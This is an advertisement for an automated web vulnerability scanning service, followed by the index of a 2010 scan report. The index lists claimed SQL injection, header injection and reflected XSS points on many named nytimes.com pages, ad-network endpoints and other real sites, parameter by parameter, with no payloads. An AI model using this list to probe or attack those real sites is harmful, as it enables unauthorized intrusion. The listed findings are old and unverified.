Contractor for Hire: Per Minute, Per Day, Bounty Hunting

Example #1: Automated Vulnerability Crawler: $1/min, max charge US $10 for 200 URLs + 10 params, covering CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge US $30 for 200 URLs + 10 params, with manual testing of high-value URI/parameter targets.
Example #3: Penetration Testing: priced on an individual case basis; use Live Chat for a quote.
Example #4:
Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection

1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]

1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]

1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]

1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]

1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]

1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]

2. HTTP header injection

2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]

2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]

2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]

2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]

2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]

2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]

2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]

2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]

2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]

2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]

2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]

2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]

2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]

2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]

2.24. http://nytimes.com/rss [REST URL parameter 1]

2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]

2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]

2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]

2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]

2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]

2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]

2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]

2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]

2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]

2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]

2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]

2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]

2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]

2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]

2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]

2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]

2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]

2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]

2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]

2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]

2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]

2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]

2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]

2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]

2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]

2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]

2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]

2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]

2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]

2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]

2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]

2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]

2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]

2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]

2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]

2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]

2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]

2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]

2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]

2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]

2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]

2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]

2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]

2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]

2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]

2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]

2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]

2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]

2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]

2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]

2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]

2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]

2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]

2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]

2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]

2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]

2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]

2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]

3. Cross-site scripting (reflected)

3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]

3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]

3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]

3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]

3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]

3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]

3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]

3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]

3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]

3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]

3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]

3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]

3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]

3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]

3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]

3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]

3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]

3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]

3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]

3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]

3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]

3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]

3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]

3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]

3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]

3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]

3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]

3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]

3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]

3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]

3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]

3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]

3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]

3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]

3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]

3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]

3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]

3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]

3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]

3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]

3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]

3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]

3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]

3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]

3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]

3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]

3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]

3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]

3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]

3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]

3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]

3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]

3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]

3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]

3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]

3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]

3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]

3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]

3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]

3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]

3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]

3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]

3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]

3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]

3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]

3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]

3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]

3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]

3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]

3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]

3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]

3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]

3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]

3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]

3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]

3.126. http://digg.com/remote-submit [REST URL parameter 1]

3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]

3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]

3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]

3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]

3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]

3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]

3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]

3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]

3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]

3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]

3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]

3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]

3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]

3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]

3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]

3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]

3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]

3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]

3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]

3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]

3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]

3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]

3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]

3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]

3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]

3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]

3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]

3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]

3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]

3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]

3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]

3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]

3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]

3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]

3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]

3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]

3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]

3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]

3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]

3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]

3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]

3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]

3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]

3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]

3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]

3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]

3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]

3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]

3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]

3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]

3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]

3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]

